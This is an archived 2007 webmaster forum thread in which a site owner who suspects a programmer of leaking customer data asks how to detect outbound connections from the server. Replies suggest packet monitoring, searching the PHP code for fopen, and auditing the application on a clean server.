Possible to capture outbound traffic from server?

Forum Moderators: phranque

Message Too Old, No Replies

Possible to capture outbound traffic from server?

Trying to see if scripts are sending out sensitive information to bots.

urbanzen

4:58 am on Dec 4, 2007 (gmt 0)

Hello webmasters,

I'm suspecting our inhouse programmer has coded a script to collect emails and other sensitive customers data, to his server. because it could be any of .com¦.net¦.info¦.us¦.xxwhatever, or an obfusicated IP address ping, I couldn't grep over the codes and find proof.

The only way I can think of, is to eavesdrop, or read logfiles on if the server is calling on scripts outside of it's domain, or posting GET or POST requests to other servers.

Is there a good way to check on these possibilities? A way to eavesdrop per say?

gergoe

12:40 pm on Dec 4, 2007 (gmt 0)

Outbound traffic is not going through the Apache (or any other webserver software), it is implemented in the programming language, and the only way to find something like that (besides of searching the code) is that you install/run a packet monitor application (like Ethereal [ethereal.com]), which monitors the network traffic of your server, and produces a logfile out of that. Personally I think the searching of such a code is much efficient, depending of the programming language, you only need to search for few commands, like in the case of PHP, only the fopen command (and maybe a few more, but this is the most likelly) needs to be looked up, where it is being used.

urbanzen

2:16 am on Dec 5, 2007 (gmt 0)

Thank you very much George,

I'll try packet monitoring as you suggest.

There are so many ways to obscifucate outbound commands, that I wouldn't know how to search in the first place.

What if it's an eval(unserialize(#*$!xx)), or Hexidecimal characters, or a header() command? It's hard for me in this case to search for malicious codes.

jdMorgan

2:35 am on Dec 5, 2007 (gmt 0)

It does not matter -- You are looking for outbound connections. Unless you proxy some incoming requests to other servers, the only 'normal' outbound connections your server will make will be for e-mail and --if you use them-- reverse-DNS lookups. Otherwise, your server just sits there waiting for inbound connections from clients.

Jim

urbanzen

3:15 am on Dec 5, 2007 (gmt 0)

Ok would it be possible for malicious coders to physically write data into a text file or an rss feed onto the server and ping the list at regular intervals?

Or leave open an access hole into the mysql database (scripts coded in php)?

That way, that's not outbound, but inbound in this case.

I might be paranoid, but customers' information and privacy, and our company's reputation can be at stake. So I'm extra careful when Company is working with someone I don't trust.

gergoe

5:06 pm on Dec 5, 2007 (gmt 0)

If you are so afraid of stealing personal (sensitive?) information, then I'd suggest you to find someone who can audit the application. One way to do that would be to move it to a clean server, install a packet monitor, install a file (access) monitor, use those parts of the application which is working with sensitive information, and then evaluate the logs.

If you are afraid of accessing your database directly, then introduce a proper user system, only give access to those tables to those users, which really need access to that information, that's something you can do anyway.